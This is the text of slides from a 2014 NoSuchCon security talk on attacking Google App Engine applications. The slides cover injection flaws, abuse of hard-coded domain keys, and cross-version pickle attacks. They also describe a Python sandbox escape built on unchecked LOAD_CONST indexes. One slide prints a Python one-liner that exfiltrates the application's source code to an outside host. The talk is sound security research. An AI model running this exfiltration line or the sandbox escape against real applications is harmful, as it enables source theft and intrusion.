SlideShare a Scribd company logo

NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security

N
NoSuchCon

NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security

Technology
1 of 39
Download to read offline
Presented 20/11/2014 For NoSuchCon 2014 By Nicolas Collignon Google Apps Engine G-Jacking AppEngine-based applications
 Introduction to GAE  G-Jacking – The code – The infrastructure – The sandbox  Conclusion
Introduction
4 / 39 What is GAE?  A Platform-As-A-Service for Web applications – SDK provided to develop, test and deploy GAE applications – services and back-ends are hosted in Google datacenters – Data can be hosted in Europe after filling the Extended European Offering form  Supported programming languages:
Overview of the architecture  A « load-balancer + reverse-proxy + application server + backends » solution – IPv4 and IPv6 – HTTP, HTTPS, SPDY/3, SPDY/3.1, SPDY/4a4 and QUIC unified as FastCGI – Can be connected with HTTP services within an internal network via Google SDC
Attacking the app implementation
Developers still...  ... manipulate raw SQL queries – MySQL injections still happen in Google Cloud SQL – GQL injections seem more rare  ... control raw HTTP responses – XSS still happen (even in GAE samples code...)  ... need to implement security features and/or correctly use frameworks – CSRF / XXE – Direct ID references
The urlfetch API  Requesting external Web services – SSL certificates validation is not enabled by default – Developers may (forget to) use the check_certificate=True argument  Requesting GAE Web services – Google provides trusted (not spoofable) HTTP headers such as X-Appengine-Inbound-Appid or X-Appengine-Cron – but many applications extract the caller identity by using the User-Agent header AppEngine-Google; (+http://code.google.com/appengine; appid: APP_ID)
Other APIs  Socket with SSL – Need to use CERT_REQUIRED and match_hostname  Channel – XSS may help to steal the token generated by create_channel in order to intercept channel messages  Task Queues – Push queues workers URLs handlers must be restricted to admin roles
Python RCE  How to obtain arbitrary Python code execution? – A Google account that manage the app. is compromised – By exploiting eval/unserialize/pickle vulnerabilities  Pentesters want persistent shells – Install or inject a XMPP end-point and register an URL route
set payload gae/py_bind_gtalk  Directly interact with the application core components
GSOD: Google Screen Of Death  DoS attacks turn into over-billing attacks – Most API are billed on a share-basis : CPU, Memory, storage and network services I/O – Daily or per-minute quotas can be setup  IP blacklisting is supported – Blacklisted IP list is maintained by the customer – applications are also exposed on IPv6 and efficiently blacklisting IPv6 networks is hard
Attacking the GAE infrastructure
Replicating Google @ home  Why all developments cannot be done off-line? – GAE SDK testing tools cannot replicate all available services – It costs money to deploy tests mails/files/databases/etc. servers – Some bugs will trigger only when the application is deployed in Google datacenter: urlfetch API, authorization, SDC, quota handling  What we see: Developers access sensitive credentials – Developers can compromise more services than just the one needed for their needs – Authentication tokens expires but can be renewed – Having a distinct test Google App domain can enforce data isolation
Use case: the provisioning API  An application uses the GAE Provisioning API – Mostly used by large organizations that need to automate users management tasks – Sensitive API which requires a secret domain key  Classic fail: production domain key is stored in an insecure place – Google User management cannot be replicated in-house so the primary domain key ends up hard-coded in the application source code – Accessing the domain key is as dangerous as compromising a Windows domain administrator account  Cool pentesting post-exploitation tricks – Perform OAuth impersonations using the domain key to spoof accounts identity – Crawl Tera bytes of consumers data in few seconds with the power of Google services
An environment is not a version  Non-GAE applications: what we are used to see – Development and production environments are isolated and have different security levels – Only 1 version of the application is running in production  GAE applications: what we often see – Multiple versions with and without debug features of the same application are running concurrently on the same Google Apps account – We can attack the version “secure” PROD-V2 via vulnerabilities in “insecure” PROD-V1 or DEV-V3
Use case: getting the source code  Isolation between versions is possible but often not implemented – Blobstore, Datastore, memcache and tasks queues are shared unless the application uses the Namespaces API  Most GAE applications trust data stored in the memcache back-end – Pickle is often used explicitly or implicitly through sessions management libraries – Evil versions can easily replace trusted data with a malicious Python exploit – The “irreversible” download source kill-switch can be bypassed __import__("google.appengine.api.urlfetch") .appengine.api.urlfetch.fetch(url="http://pouet.synacktiv.fr/", payload=open(__import__("os").environ["PATH_TRANSLATED"].rpartition("/") [2][:-1]).read(), method="POST")
SDC: hard-coded credentials  When GAE applications are exposed to 3rd parties – Need to authenticate both Google accounts and another kind of app-specific accounts – The SDC agent only accepts requests from connections authenticated with Google accounts – Developers need to hard-code some Google account credentials when dealing with requests coming from non-Google accounts GAE Application Google account Standard account internal application SDC channel Hard-coded Google account
SDC: bypassing internal filtering  SDC agent white-list features – App-Id filtering: it is not used once many GAE applications use the SDC agent – URL filtering: it is not used because each URL Web services must be defined in the configuration GAE Application evil application Same Google App domain 1 SDC channel Deploy app. 2 Corporate network Contact firewalled server
The GAE Python sandbox: “Global overview”
Attacking the GAE Python sandbox: “Development environment”
Restricted API forgotten references  open() function is restricted when the GAE server is bootstrapped
Restricted API forgotten references  But a reference to “open” is kept in GAE context
Attacking misplaced hooks  Python module os is restricted – Forbid commands execution – it's a wrapper for the unrestricted module posix
Attacking the GAE Python sandbox: “@ google datacenter”
The LOAD_CONST opcode  pushes co_consts[index] onto the stack – index is not checked against co_names tuple bounds if DEBUG mode is disabled – useful optimization feature :)  GAE applications can create or modify code objects – The Google Python VM is not compiled with DEBUG mode – We can ask the VM to load a Python object from a tuple with an unverified index /* Macro, trading safety for speed */ #define PyTuple_GET_ITEM(op, i) (((PyTupleObject*)(op))->ob_item[i]) case LOAD_CONST: x = GETITEM(consts, oparg); Py_INCREF(x); PUSH(x);
Calculate the tuple index  Have LOAD_CONST returns an arbitrary pointer – id() returns the base address of an object – We can fill the VM memory with arbitrary data  index = ( id(evil_obj) - id(tuple_obj) - head_size ) / pointer_size – We can compute the tuple index in order to reference an arbitrary memory area co_consts tuple ( , … ), id(tuple_obj) arbitrary datahead PyObject * PyObject * junk... id(tuple_obj) + head_size id(evil_obj)
bytearray object is helpful  bytearray object exposes r/w access to memory – If we control the bounds of the mapped area if can r/w everywhere in memory – The vtable pointer used in object headers can be guessed – We use a innocent string object as a container for an evil bytearray PyStringObject pointer to arbitrary r/w memory id(bytearray) head string data PyByteArrayObject var_head head buffer pointer buffer size VAR_HEAD refs count vtable pointer
Back to LOAD_CONST  Packing everything: bytearray + tuple index + LOAD_CONST – We need 2 containers: 1 for the bytearray and 1 for the pointer to bytearray – We run LOAD_CONST + RETURN_VALUE bytecodes that returns a bytearray than can r/w arbitrary memory – If we try to access an unmapped addresses, the Python VM crashes  From arbitrary r/w to arbitrary code execution – We can patch Python objects methods pointers → we can call arbitrary address (control $rip) – We can patch Python VM .plt section → we can safely call arbitrary libc symbol co_consts tuple ( , … ),PyObject * container #1 ByteArrayPyObject * container #2 pointer tuple index adjusted to go here Python VM fseek(A,B,C) Python code file('...').seek(A,B,C) Python .plt XYZ(A,B,C) mmap()+ copy + mprotect()+ call
Black-box pentesting is fun  Exploit reliable with many cpython versions but not where we want – arbitrary r/w to memory works @ google but... – Native Client → no mmap + mprotect → no shellcode
Exploiting @ google  Still having fun under the NaCl sandbox layer – Use the bytearray r/w exploit to recover libc symbols used by the VM – Use pattern matching and heuristics to locate NaCl ELF loader context – Recover all sandboxed GAE hosting implementation PyTypeObject pointers guessed with id() CPython .data .text .plt / .got method pointers disassembly libc .text xrefs symbols disassembly heuristics
Fun @ google  Ok ok … no shellcode but g-john – native CPU perf with __sha512_crypt_r ...  Understand GAE implementation – C++ class appengine, apphosting, udrpc, speckle
Conclusion
Final words...  Google security is implemented in depth – Python sandbox can be evaded but it's only the first security layer – The SDK sandbox has no NaCl security layer  Pentesting GAE environments – Classic Web attacks work because developers always need to code “securely” – Getting access to 1 GAE application source code or developer's workstation may lead to the compromise of several services used by one domain – An insecure SDC agent setup may help to bypass internal network firewalls  The GAE framework is complex – It's not easy to migrate to GAE authentication and authorization models – Sensitive credentials are often hard-coded in the wrong places
THANKS FOR YOUR ATTENTION. ANY QUESTIONS ?

Recommended

Dependencies Managers in C/C++. Using stdcpp 2014
Dependencies Managers in C/C++. Using stdcpp 2014Dependencies Managers in C/C++. Using stdcpp 2014
Dependencies Managers in C/C++. Using stdcpp 2014biicode
 
Post-mortem Debugging of Windows Applications
Post-mortem Debugging of Windows ApplicationsPost-mortem Debugging of Windows Applications
Post-mortem Debugging of Windows ApplicationsGlobalLogic Ukraine
 
Minko - Scripting 3D apps with Lua and C++
Minko - Scripting 3D apps with Lua and C++Minko - Scripting 3D apps with Lua and C++
Minko - Scripting 3D apps with Lua and C++Minko3D
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
 
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)Advanced Eclipse Workshop (held at IPC2010 -spring edition-)
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)Bastian Feder
 
Breaking iOS Apps using Cycript
Breaking iOS Apps using CycriptBreaking iOS Apps using Cycript
Breaking iOS Apps using Cycriptn|u - The Open Security Community
 
Custom Buildpacks and Data Services
Custom Buildpacks and Data ServicesCustom Buildpacks and Data Services
Custom Buildpacks and Data ServicesTom Kranz
 

Recommended

Dependencies Managers in C/C++. Using stdcpp 2014
Dependencies Managers in C/C++. Using stdcpp 2014Dependencies Managers in C/C++. Using stdcpp 2014
Dependencies Managers in C/C++. Using stdcpp 2014biicode
 
Post-mortem Debugging of Windows Applications
Post-mortem Debugging of Windows ApplicationsPost-mortem Debugging of Windows Applications
Post-mortem Debugging of Windows ApplicationsGlobalLogic Ukraine
 
Minko - Scripting 3D apps with Lua and C++
Minko - Scripting 3D apps with Lua and C++Minko - Scripting 3D apps with Lua and C++
Minko - Scripting 3D apps with Lua and C++Minko3D
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
 
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)Advanced Eclipse Workshop (held at IPC2010 -spring edition-)
Advanced Eclipse Workshop (held at IPC2010 -spring edition-)Bastian Feder
 
Breaking iOS Apps using Cycript
Breaking iOS Apps using CycriptBreaking iOS Apps using Cycript
Breaking iOS Apps using Cycriptn|u - The Open Security Community
 
Custom Buildpacks and Data Services
Custom Buildpacks and Data ServicesCustom Buildpacks and Data Services
Custom Buildpacks and Data ServicesTom Kranz
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Enginesc0c0n - International Cyber Security and Policing Conference
 
How to reverse engineer Android applications
How to reverse engineer Android applicationsHow to reverse engineer Android applications
How to reverse engineer Android applicationshubx
 
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...Priyanka Aash
 
Discovering the p2 API
Discovering the p2 APIDiscovering the p2 API
Discovering the p2 APIPascal Rapicault
 
C&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and DominoC&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and DominoDave Delay
 
Improving DroidBox
Improving DroidBoxImproving DroidBox
Improving DroidBoxKelwin Yang
 
Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I) Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I) Mobivery
 
Reverse engineering android apps
Reverse engineering android appsReverse engineering android apps
Reverse engineering android appsPranay Airan
 
Ecto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With ElixirEcto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With ElixirYurii Bodarev
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoTBartosz Kosarzycki
 
Accessing Google Cloud APIs
Accessing Google Cloud APIsAccessing Google Cloud APIs
Accessing Google Cloud APIswesley chun
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxNashet Ali
 
Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...wesley chun
 
High quality ap is with api platform
High quality ap is with api platformHigh quality ap is with api platform
High quality ap is with api platformNelson Kopliku
 
Deploy a PHP App on Google App Engine
Deploy a PHP App on Google App EngineDeploy a PHP App on Google App Engine
Deploy a PHP App on Google App EngineMichele Orselli
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsMarcelo Pinheiro
 
Google app-engine-with-python
Google app-engine-with-pythonGoogle app-engine-with-python
Google app-engine-with-pythonDeepak Garg
 
NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017Maarten Balliauw
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes securityThomas Fricke
 
DevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChungDevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChungKAI CHU CHUNG
 
Build your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesBuild your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesMartin Czygan
 
Webinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through ScriptingWebinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through ScriptingForgeRock
 

More Related Content

What's hot

How to reverse engineer Android applications
How to reverse engineer Android applicationsHow to reverse engineer Android applications
How to reverse engineer Android applicationshubx
 
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...Priyanka Aash
 
C&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and DominoC&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and DominoDave Delay
 
Improving DroidBox
Improving DroidBoxImproving DroidBox
Improving DroidBoxKelwin Yang
 
Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I) Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I) Mobivery
 
Reverse engineering android apps
Reverse engineering android appsReverse engineering android apps
Reverse engineering android appsPranay Airan
 
Ecto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With ElixirEcto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With ElixirYurii Bodarev
 

What's hot (9)

Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 
How to reverse engineer Android applications
How to reverse engineer Android applicationsHow to reverse engineer Android applications
How to reverse engineer Android applications
 
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
 
Discovering the p2 API
Discovering the p2 APIDiscovering the p2 API
Discovering the p2 API
 
C&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and DominoC&S APIs in IBM Notes and Domino
C&S APIs in IBM Notes and Domino
 
Improving DroidBox
Improving DroidBoxImproving DroidBox
Improving DroidBox
 
Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I) Formacion en movilidad: Conceptos de desarrollo en iOS (I)
Formacion en movilidad: Conceptos de desarrollo en iOS (I)
 
Reverse engineering android apps
Reverse engineering android appsReverse engineering android apps
Reverse engineering android apps
 
Ecto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With ElixirEcto and Phoenix: Doing Web With Elixir
Ecto and Phoenix: Doing Web With Elixir
 

Similar to NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security

Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoTBartosz Kosarzycki
 
Accessing Google Cloud APIs
Accessing Google Cloud APIsAccessing Google Cloud APIs
Accessing Google Cloud APIswesley chun
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxNashet Ali
 
Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...wesley chun
 
High quality ap is with api platform
High quality ap is with api platformHigh quality ap is with api platform
High quality ap is with api platformNelson Kopliku
 
Deploy a PHP App on Google App Engine
Deploy a PHP App on Google App EngineDeploy a PHP App on Google App Engine
Deploy a PHP App on Google App EngineMichele Orselli
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsMarcelo Pinheiro
 
Google app-engine-with-python
Google app-engine-with-pythonGoogle app-engine-with-python
Google app-engine-with-pythonDeepak Garg
 
NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017Maarten Balliauw
 
DevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChungDevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChungKAI CHU CHUNG
 
Build your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesBuild your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesMartin Czygan
 
Webinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through ScriptingWebinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through ScriptingForgeRock
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
What is App Engine? O
What is App Engine? OWhat is App Engine? O
What is App Engine? Oikailan
 
Raspberry pi and Google Cloud
Raspberry pi and Google CloudRaspberry pi and Google Cloud
Raspberry pi and Google CloudFaisal Mehmood
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersJavan Rasokat
 
API Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentestersAPI Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentestersInon Shkedy
 
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud Run
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud RunDesigning flexible apps deployable to App Engine, Cloud Functions, or Cloud Run
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud Runwesley chun
 

Similar to NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security (20)

Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoT
 
Accessing Google Cloud APIs
Accessing Google Cloud APIsAccessing Google Cloud APIs
Accessing Google Cloud APIs
 
KSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptxKSS Session and Tech Talk-2019 on IOT.pptx
KSS Session and Tech Talk-2019 on IOT.pptx
 
Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...Build an AI/ML-driven image archive processing workflow: Image archive, analy...
Build an AI/ML-driven image archive processing workflow: Image archive, analy...
 
High quality ap is with api platform
High quality ap is with api platformHigh quality ap is with api platform
High quality ap is with api platform
 
Deploy a PHP App on Google App Engine
Deploy a PHP App on Google App EngineDeploy a PHP App on Google App Engine
Deploy a PHP App on Google App Engine
 
Porting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability SystemsPorting Rails Apps to High Availability Systems
Porting Rails Apps to High Availability Systems
 
Google app-engine-with-python
Google app-engine-with-pythonGoogle app-engine-with-python
Google app-engine-with-python
 
NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017NuGet beyond Hello World - DotNext Piter 2017
NuGet beyond Hello World - DotNext Piter 2017
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
DevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChungDevFest 2022 - Cloud Workstation Introduction TaiChung
DevFest 2022 - Cloud Workstation Introduction TaiChung
 
Build your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resourcesBuild your own discovery index of scholary e-resources
Build your own discovery index of scholary e-resources
 
Webinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through ScriptingWebinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
Webinar: Extend The Power of The ForgeRock Identity Platform Through Scripting
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
What is App Engine? O
What is App Engine? OWhat is App Engine? O
What is App Engine? O
 
Raspberry pi and Google Cloud
Raspberry pi and Google CloudRaspberry pi and Google Cloud
Raspberry pi and Google Cloud
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
API Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentestersAPI Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentesters
 
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud Run
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud RunDesigning flexible apps deployable to App Engine, Cloud Functions, or Cloud Run
Designing flexible apps deployable to App Engine, Cloud Functions, or Cloud Run
 
Sst hackathon express
Sst hackathon expressSst hackathon express
Sst hackathon express
 

More from NoSuchCon

NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNoSuchCon
 
NSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNoSuchCon
 
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNoSuchCon
 
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNoSuchCon
 
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNoSuchCon
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNoSuchCon
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNoSuchCon
 
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNoSuchCon
 
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNoSuchCon
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNoSuchCon
 
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNoSuchCon
 
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNoSuchCon
 
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNoSuchCon
 
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNoSuchCon
 

More from NoSuchCon (16)

NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
NSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNSC #2 - Challenge Introduction
NSC #2 - Challenge Introduction
 
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
 
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
 
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNSC #2 - D2 06 - Richard Johnson - SAGEly Advice
